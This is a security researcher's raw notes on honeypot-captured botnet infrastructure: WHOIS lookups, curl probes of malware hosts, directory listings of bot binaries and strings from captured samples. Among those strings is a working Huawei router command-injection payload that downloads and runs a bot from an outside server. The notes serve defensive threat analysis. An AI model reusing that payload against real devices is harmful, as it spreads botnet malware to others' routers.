|
|
Analysis Tech Art Repositories | |||||||
Random servers/malware located, and general notes.
Tue Aug 29 22:03:49 2023
(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there’s a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)
https://bcable.net/analysis-ukr-prelim.html
https://bcable.net/analysis-ukr-graphs.html
https://bcable.net/analysis-ukr-indicators.html
https://bcable.net/analysis-ukr-ru_map_sessions.html
https://bcable.net/analysis-ukr-cn_map_sessions.html
https://bcable.net/analysis-ukr-miori_fail.html
https://bcable.net/analysis-ukr-botnet_perl.html
https://bcable.net/analysis-ukr-ddos_gh0st.html
https://bcable.net/analysis-ukr-indicators_2023.html
https://bcable.net/analysis-ukr-crew_001.html
https://bcable.net/analysis-ukr-inventory_attack.html
https://bcable.net/analysis-ukr-crew_002.html
library(openssl)
## Linking to: OpenSSL 3.0.8 7 Feb 2023
clamscan_hashes <- read.csv("../graphs/clamscan_hashes.csv")
malware_files <- list.files("redacted/malware", recursive=TRUE)
malware_table <- sapply(malware_files, FUN=function(x){
as.character(sha256(file(paste0("redacted/malware/", x))))
})
malware_sha256 <- data.frame(
Hash.SHA256=as.vector(malware_table),
File.Name=names(malware_table)
)
malware_df <- merge(malware_sha256, clamscan_hashes, by="Hash.SHA256")
write.csv(malware_df, "malware_scans.csv", row.names=FALSE)
NetRange: 34.128.0.0 - 34.191.255.255
CIDR: 34.128.0.0/10
NetName: GOOGL-2
NetHandle: NET-34-128-0-0-1
Parent: NET34 (NET-34-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Google LLC (GOOGL-2)
RegDate: 2021-01-08
Updated: 2021-01-08
Ref: https://rdap.arin.net/registry/ip/34.128.0.0
OrgName: Google LLC
OrgId: GOOGL-2
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US
RegDate: 2006-09-29
Updated: 2019-11-01
Comment: *** The IP addresses under this Org-ID are in use by Google Cloud customers ***
$ curl -i http://34.133.16.87/
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 17:58:40 GMT
Server: Apache/2.4.53 (CentOS Stream)
Last-Modified: Thu, 05 Jan 2023 20:01:45 GMT
ETag: "0-5f189c54138f6"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://34.133.16.87/x0ox0ox0oxDefault/
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 17:59:08 GMT
Server: Apache/2.4.53 (CentOS Stream)
Last-Modified: Thu, 05 Jan 2023 20:01:45 GMT
ETag: "0-5f189c54144ae"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
inetnum: 193.47.61.0 - 193.47.61.255
netname: Serverion_BV-NET
org: ORG-DCB8-RIPE
abuse-c: SB27731-RIPE
country: NL
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
mnt-domains: mnt-nl-descapital-1
mnt-lower: mnt-nl-descapital-1
mnt-routes: mnt-nl-descapital-1
status: ASSIGNED PA
mnt-by: MNT-NETERRA
created: 2022-04-21T14:04:14Z
last-modified: 2022-09-26T14:13:37Z
source: RIPE
$ curl -i http://193.47.61.42
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 18:09:49 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 29 Dec 2022 02:24:05 GMT
ETag: "0-5f0ee2dd791b5"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 18:10:13 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 29 Dec 2022 02:24:05 GMT
ETag: "0-5f0ee2dd7a925"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 45.81.39.0 - 45.81.39.255
netname: SERVERION_BV-NET
org: ORG-DCB8-RIPE
country: NL
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
mnt-domains: mnt-nl-descapital-1
mnt-lower: mnt-nl-descapital-1
mnt-routes: mnt-nl-descapital-1
status: ASSIGNED PA
mnt-by: MNT-NETERRA
created: 2022-12-13T14:35:09Z
last-modified: 2022-12-13T14:35:09Z
source: RIPE
$ curl -i http://45.81.39.72/
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 18:18:16 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 28 Dec 2022 07:32:31 GMT
ETag: "8-5f0de5f0d950c"
Accept-Ranges: bytes
Content-Length: 8
Content-Type: text/html; charset=UTF-8
i love u
Interesting strings:
SNQUERY: 127.0.0.1:AAAAAA:xsvr
M-SEARCH * HTTP/1.1
HOST: 255.255.255.255:1900
MAN: "ssdp:discover"
ST: urn:dial-multiscreen-org:service:dial:1
USER-AGENT: Google Chrome/60.0.3112.90 Windows
/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/
xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x
93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xI
D/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A
/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/
xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x
93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xI
D/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A
/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/
xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A
objectClass0
service:service-agent
_services
TeamSpeak
Windows XP
HTTP/1.1 404 Not Found
Server: Apache
Content-Length:
HTTP/1.1 200 OK
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="ht
tp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPC
onnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.81.39.72 -l /tmp/.oxy -r /mips; /bin/busybox chmod 7
77 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
</u:Upgrade></s:Body></s:Envelope>
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569
d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop
="auth", nc=00000001, cnonce="248d1a2560100669"
Content-Length:
&& mkdir
; chmod 777
bin/busybox
bin/watchdog
bin/systemd
/bin/busybox
/bin/watchdog
/bin/systemd
w5q6he3dbrsgmclkiu4to18npavj702f
GET /%s HTTP/1.0
User-Agent: Update v1.0
npxXoudifFeEgGaACScs
inetnum: 113.96.0.0 - 113.111.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
abuse-c: AC1573-AP
status: ALLOCATED PORTABLE
remarks: service provider
remarks: --------------------------------------------------------
remarks: To report network abuse, please contact mnt-irt
remarks: For troubleshooting, please contact tech-c and admin-c
remarks: Report invalid contact via www.apnic.net/invalidcontact
remarks: --------------------------------------------------------
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-GD
mnt-routes: MAINT-CHINANET-GD
mnt-irt: IRT-CHINANET-CN
last-modified: 2021-06-15T08:06:04Z
source: APNIC
$ curl -i http://113.106.167.11/x/
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jan 2023 18:29:48 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Mon, 05 Dec 2022 01:12:38 GMT
Connection: keep-alive
ETag: "638d4586-0"
Accept-Ranges: bytes
$ curl -i http://113.106.167.11/
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jan 2023 18:30:41 GMT
Content-Type: text/html
Content-Length: 2781
Last-Modified: Wed, 09 May 2018 14:03:22 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5af2ffaa-add"
Accept-Ranges: bytes
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>LNMP一键安装包 by Licess</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="author" content="Licess">
<meta name="keywords" content="lnmp,lnmp一键安装包,一键安装包">
<meta name="description" content="您已成功安装LNMP一键安装包!">
恭喜您,LNMP一键安装包安装成功!
LNMP一键安装包
LNMP一键安装包是一个用Linux Shell编写的可以为CentOS/RadHat/Fedora、Debian/Ubuntu/Raspbian/Deepin VPS或独
立主机安装LNMP(Nginx/MySQL/PHP)、LNMPA(Nginx/MySQL/PHP/Apache)、LAMP(Apache/MySQL/PHP)生产环境的Shell程序
。同时提供一些实用的辅助工具如:虚拟主机管理、FTP用户管理、Nginx、MySQL/MariaDB、PHP的升级、常用缓存组
件Redis、Xcache等的安装、重置MySQL root密码、502自动重启、日志切割、SSH防护DenyHosts/Fail2Ban、备份等许多
实用脚本。
查看本地环境: 探针 phpinfo phpMyAdmin(为了安全,建议将phpmyadmin目录重命名为不容易猜到的目录!)
更多LNMP一键安装包信息请访问: https://lnmp.org
LNMP一键安装包问题反馈请访问: https://bbs.vpser.net/forum-25-1.html
VPS相关教程: https://www.vpser.net/vps-howto/
美国VPS推荐: https://www.vpser.net/usa-vps/
声明:出现该页面只说明您当前访问的网站使用了LNMP一键安装包搭建的环境,当前网站与LNMP一键安装包、VPS侦探
和licess不存在任何关系!
LNMP一键安装包 by Licess & VPS侦探
inetnum: 185.225.74.0 - 185.225.74.255
netname: SERVERION_BV-NET
abuse-c: SB27731-RIPE
org: ORG-DCB8-RIPE
country: NL
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
mnt-lower: mnt-nl-descapital-1
created: 2022-06-28T09:01:54Z
last-modified: 2022-09-26T14:44:21Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
phone: +31851308338
phone: +13023803902
admin-c: AA35882-RIPE
tech-c: TA7409-RIPE
abuse-c: AR60082-RIPE
mnt-ref: mnt-nl-descapital-1
mnt-ref: RELCOMGROUP-EXT-MNT
mnt-ref: FREENET-MNT
mnt-ref: MNT-NETERRA
mnt-ref: MNT-MAYAK
mnt-ref: bg-mcreative-1-mnt
mnt-ref: mnt-bg-mconsulting15-1
mnt-ref: bg-mconsulting-1-mnt
mnt-ref: MNT-MCONSULTING
mnt-ref: mnt-bg-ccomp-1
mnt-by: RIPE-NCC-HM-MNT
mnt-by: mnt-nl-descapital-1
created: 2020-03-17T15:00:52Z
last-modified: 2022-09-26T13:22:34Z
source: RIPE # Filtered
mnt-ref: AZERONLINE-MNT
mnt-ref: interlir-mnt
$ curl -i http://185.225.74.55/
HTTP/1.1 200 OK
Date: Sun, 15 Jan 2023 19:57:18 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 10 Jan 2023 15:11:55 GMT
ETag: "8-5f1ea4df2d0fb"
Accept-Ranges: bytes
Content-Length: 8
Content-Type: text/html; charset=UTF-8
i love u
2023-01-24/httpd-[bcable-redacted]-80-90.151.171.108-18499-2023-01-24T18:31:24.067439-gSkr7x:stream = [('in', b'CONNECT eth0.me:443 HTTP/1.1\x0d\x0aHost: eth0.me:443\x0d\x0aProxy-Connection: keep-alive\x0d\x0aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https://best-proxies.ru/faq/#from)\x0d\x0a\x0d\x0a'),
2023-01-24/httpd-[bcable-redacted]-80-90.151.171.108-59777-2023-01-24T18:31:24.242769-auiBR0:stream = [('in', b'GET http://eth0.me?Z71008541870Q1 HTTP/1.1\x0d\x0aHost: eth0.me\x0d\x0aCookie: Z71008541870Q1\x0d\x0aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https://best-proxies.ru/faq/#from)\x0d\x0aReferer: https://google.com/\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 9\x0d\x0aConnection: close\x0d\x0a\x0d\x0apost=true\x0d\x0a\x0d\x0a'),
$ curl -i "http://eth0.me?Z71008541870Q1"
HTTP/1.1 200 OK
Server: nginx/1.22.0
Date: Wed, 25 Jan 2023 19:19:21 GMT
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
X.X.X.X
Response was the IP of the VPN I was connected to at the time.
$ curl -i "http://eth0.me"
HTTP/1.1 200 OK
Server: nginx/1.22.0
Date: Wed, 25 Jan 2023 19:21:43 GMT
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
X.X.X.X
Same, which means they could easily track the VPN IP to the honeypot query. Interesting tracking technique.
inetnum: 45.12.253.0 - 45.12.253.255
netname: SERVERION_BV-NET
org: ORG-DCB8-RIPE
country: NL
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
mnt-domains: mnt-nl-descapital-1
mnt-lower: mnt-nl-descapital-1
mnt-routes: mnt-nl-descapital-1
status: ASSIGNED PA
mnt-by: MNT-NETERRA
created: 2022-12-13T14:35:09Z
last-modified: 2022-12-13T14:35:09Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
phone: +31851308338
phone: +13023803902
admin-c: AA35882-RIPE
tech-c: TA7409-RIPE
abuse-c: AR60082-RIPE
mnt-ref: mnt-nl-descapital-1
mnt-ref: RELCOMGROUP-EXT-MNT
mnt-ref: FREENET-MNT
mnt-ref: MNT-NETERRA
mnt-ref: MNT-MAYAK
mnt-ref: bg-mcreative-1-mnt
mnt-ref: mnt-bg-mconsulting15-1
mnt-ref: bg-mconsulting-1-mnt
mnt-ref: MNT-MCONSULTING
mnt-ref: mnt-bg-ccomp-1
mnt-by: RIPE-NCC-HM-MNT
mnt-by: mnt-nl-descapital-1
created: 2020-03-17T15:00:52Z
last-modified: 2022-09-26T13:22:34Z
source: RIPE # Filtered
mnt-ref: AZERONLINE-MNT
mnt-ref: interlir-mnt
$ curl -i http://45.12.253.180/
HTTP/1.1 200 OK
Date: Wed, 25 Jan 2023 19:38:58 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Sat, 21 Jan 2023 01:05:52 GMT
ETag: "0-5f2bbc4725a49"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Index of /a
[ICO] Name Last modified Size Description
═════════════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] 76d32be0.sh 2023-01-20 20:27 4.3K
[ ] 883dremos.sh 2023-01-21 18:44 1.5K
[ ] 77676d32be0.sh 2023-01-21 16:09 3.9K
[DIR] b/ 2023-01-21 19:41 -
[ ] bin 2023-01-20 20:30 4.3K
[ ] bins.sh 2023-01-20 20:27 4.3K
[ ] bot.arc 2023-01-20 20:32 81K
[ ] bot.arm 2023-01-20 20:32 33K
[ ] bot.arm5 2023-01-20 20:32 29K
[ ] bot.arm7 2023-01-20 20:32 57K
[ ] bot.i686 2023-01-20 20:32 34K
[ ] bot.m68k 2023-01-20 20:32 78K
[ ] bot.mips 2023-01-20 20:32 34K
[ ] bot.mpsl 2023-01-20 20:32 35K
[ ] bot.ppc 2023-01-20 20:32 31K
[ ] bot.sh4 2023-01-20 20:32 73K
[ ] bot.spc 2023-01-20 20:32 81K
[ ] bot.x86 2023-01-20 20:32 32K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 81K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 33K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 29K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 37K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 57K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 34K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 78K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 34K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 35K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 31K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 73K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 81K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 32K
[ ] wget.sh 2023-01-20 20:27 4.3K
[ ] wwgget.sh 2023-01-21 01:26 3.9K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 81K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 33K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 29K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 37K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 57K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 34K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 78K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 34K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 35K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 31K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 73K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 81K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 32K
═════════════════════════════════════════════════════════════════════
Index of /a/b
[ICO] Name Last modified Size Description
═════════════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] 76d32be0.sh 2023-01-20 20:27 4.3K
[ ] 883dremos.sh 2023-01-21 18:44 1.5K
[ ] 77676d32be0.sh 2023-01-21 16:10 3.9K
[ ] bin 2023-01-20 20:30 4.3K
[ ] bins.sh 2023-01-20 20:27 4.3K
[ ] bot.arc 2023-01-20 20:31 81K
[ ] bot.arm 2023-01-20 20:31 33K
[ ] bot.arm5 2023-01-20 20:31 29K
[ ] bot.arm7 2023-01-20 20:31 57K
[ ] bot.i686 2023-01-20 20:31 34K
[ ] bot.m68k 2023-01-20 20:31 78K
[ ] bot.mips 2023-01-20 20:31 34K
[ ] bot.mpsl 2023-01-20 20:31 35K
[ ] bot.ppc 2023-01-20 20:31 31K
[ ] bot.sh4 2023-01-20 20:31 73K
[ ] bot.spc 2023-01-20 20:31 81K
[ ] bot.x86 2023-01-20 20:31 32K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 81K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 33K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 29K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 37K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 57K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 34K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 78K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 34K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 35K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 31K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 73K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 81K
[ ] db0fa4b8db0333367e9b..> 2023-01-20 20:33 32K
[ ] wget.sh 2023-01-20 20:27 4.3K
[ ] wwgget.sh 2023-01-21 16:07 3.9K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 81K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 33K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 29K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 37K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 57K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 34K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 78K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 34K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 35K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 31K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 73K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 81K
[ ] x3x38db0fa4b8db03333..> 2023-01-20 20:35 32K
═════════════════════════════════════════════════════════════════════
inetnum: 175.178.0.0 - 175.178.255.255
netname: TencentCloud
descr: Tencent cloud computing (Beijing) Co., Ltd.
descr: Floor 6, Yinke Building,38 Haidian St,Haidian District Beijing
country: CN
admin-c: JT1125-AP
tech-c: JX1747-AP
abuse-c: AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
last-modified: 2021-06-16T01:25:53Z
source: APNIC
irt: IRT-CNNIC-CN
address: Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c: IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks: Please note that CNNIC is not an ISP and is not
remarks: empowered to investigate complaints of network abuse.
remarks: Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-06-16T01:39:57Z
source: APNIC
HTTP File Server
Login Search Selection Toggle timestamp Sort
Search _____________________
(X) this folder and sub-folders
( ) this folder only
( ) entire server Go Clear
Uploaded: 0 - Failed: 0 - Queued: 0
Uploading...
Reload page
0 selected Mask Invert Delete Move Archive
0 folders, 2 files, 2.0 MB
[IMG] dwer.exe
2023/1/25 19:34 1.4 MB
[IMG] kaf
2023/1/17 3:35 525.6 KB
Uptime: 08:46:01
$ file *
dwer.exe: PE32 executable (GUI) Intel 80386, for MS Windows
kaf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped
$ clamscan *
175.178.77.241/4543/dwer.exe: OK
175.178.77.241/4543/kaf: OK
----------- SCAN SUMMARY -----------
Known viruses: 8650323
Engine version: 0.103.7
Scanned directories: 0
Scanned files: 2
Infected files: 0
Data scanned: 2.08 MB
Data read: 1.96 MB (ratio 1.06:1)
Time: 17.927 sec (0 m 17 s)
Start Date: 2023:01:25 13:50:48
End Date: 2023:01:25 13:51:06
YEAH RIGHT… time to do some simple anaylsis on some of this, strings, maybe some deliberate infection of kaf…
GET %s HTTP/1.1
Host: %s
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)
Referer: http://%s%s
Pragma: no-cache
DNT: 1
Connection: Keep-Alive
GET %s HTTP/1.1
Host: %s
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible;+Googlebot/2.1;++http://www.google.com/bot.html)
Referer: http://%s%s
Pragma: no-cache
DNT: 1
Connection: Keep-Alive
Seems to at least have code to appear as bot traffic.
$ cat contained_kaf.txt | grep DST= | sed -r "s/^.* DST=([^ ]+) .* DPT=([0-9]+) .*$/\1:\2/g" | sort | uniq -c
58 45.145.230.230:6681
Very specific C2 server. No apparent DDoS chaff traffic to throw off the scent.
$ nmap -Pn -p 80,443,3389,6681,8080 45.145.230.230
Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-25 15:07 CST
Nmap scan report for 45.145.230.230
Host is up (0.11s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
3389/tcp open ms-wbt-server
6681/tcp open unknown
8080/tcp open http-proxy
Open, or just all ports open because it has been blackholed or abandoned. It could be used also as it’s own tarpit to just register who has been infected.
15:04 -!- Irssi: Looking up 45.145.230.230
15:04 -!- Irssi: Connecting to 45.145.230.230 [45.145.230.230] port 6681
15:04 -!- Irssi: Connection to 45.145.230.230 established
15:09 -!- Irssi: Connection lost to 45.145.230.230
Times out, so likely tarpit either by interception or by attacker’s choice.
NetRange: 107.189.0.0 - 107.189.31.255
CIDR: 107.189.0.0/19
NetName: PONYNET-11
NetHandle: NET-107-189-0-0-1
Parent: NET107 (NET-107-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS53667
Organization: FranTech Solutions (SYNDI-5)
RegDate: 2014-04-17
Updated: 2014-04-17
Ref: https://rdap.arin.net/registry/ip/107.189.0.0
OrgName: FranTech Solutions
OrgId: SYNDI-5
Address: 1621 Central Ave
City: Cheyenne
StateProv: WY
PostalCode: 82001
Country: US
RegDate: 2010-07-21
Updated: 2017-01-28
Ref: https://rdap.arin.net/registry/entity/SYNDI-5
OrgAbuseHandle: FDI19-ARIN
OrgAbuseName: Dias, Francisco
OrgAbusePhone: +1-778-977-8246
OrgAbuseEmail: fdias@frantech.ca
OrgAbuseRef: https://rdap.arin.net/registry/entity/FDI19-ARIN
OrgTechHandle: FDI19-ARIN
OrgTechName: Dias, Francisco
OrgTechPhone: +1-778-977-8246
OrgTechEmail: fdias@frantech.ca
OrgTechRef: https://rdap.arin.net/registry/entity/FDI19-ARIN
$ curl -i http://107.189.31.181
HTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 18:49:46 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 26 Jan 2023 12:41:38 GMT
ETag: "0-5f32a11ecc5d3"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 178.18.248.0 - 178.18.255.255
netname: CONTABO
country: DE
admin-c: MH7476-RIPE
tech-c: MH7476-RIPE
status: ASSIGNED PA
mnt-by: MNT-CONTABO
created: 2021-04-12T19:10:04Z
last-modified: 2021-04-12T19:10:04Z
source: RIPE
person: Wilhelm Zwalina
address: Contabo GmbH
address: Aschauer Str. 32a
address: 81549 Muenchen
phone: +49 89 21268372
fax-no: +49 89 21665862
nic-hdl: MH7476-RIPE
mnt-by: MNT-CONTABO
mnt-by: MNT-GIGA-HOSTING
created: 2010-01-04T10:41:37Z
last-modified: 2020-04-24T16:09:30Z
source: RIPE
$ curl -i http://178.18.250.52/
HTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 18:53:38 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Wed, 01 Feb 2023 07:33:22 GMT
ETag: "18-5f39e76880f08"
Accept-Ranges: bytes
Content-Length: 24
Content-Type: text/html; charset=UTF-8
<center>vality</center>
$ curl -i http://178.18.250.52/a/
HTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 18:53:40 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Wed, 01 Feb 2023 08:11:10 GMT
ETag: "18-5f39efdb1018b"
Accept-Ranges: bytes
Content-Length: 24
Content-Type: text/html; charset=UTF-8
<center>vality</center>
User-Agent:
Developers: EcstasyCode#8838
VGNLGVCFOKL
Seen that Discord ID above…
inetnum: 163.0.0.0 - 163.255.255.255
netname: ERX-NETBLOCK
descr: Early registration addresses
country: AU
admin-c: IANA1-AP
tech-c: IANA1-AP
abuse-c: AA1452-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: APNIC-HM
mnt-irt: IRT-APNIC-AP
last-modified: 2021-04-16T06:53:35Z
source: APNIC
irt: IRT-APNIC-AP
address: Brisbane, Australia
e-mail: helpdesk@apnic.net
abuse-mailbox: helpdesk@apnic.net
admin-c: HM20-AP
tech-c: NO4-AP
auth: # Filtered
remarks: APNIC is a Regional Internet Registry.
remarks: We do not operate the referring network and
remarks: are unable to investigate complaints of network abuse.
remarks: For information about IRT, see www.apnic.net/irt
remarks: helpdesk@apnic.net was validated on 2020-02-03
mnt-by: APNIC-HM
last-modified: 2020-02-03T02:04:33Z
source: APNIC
role: ABUSE APNICAP
address: Brisbane, Australia
country: ZZ
phone: +000000000
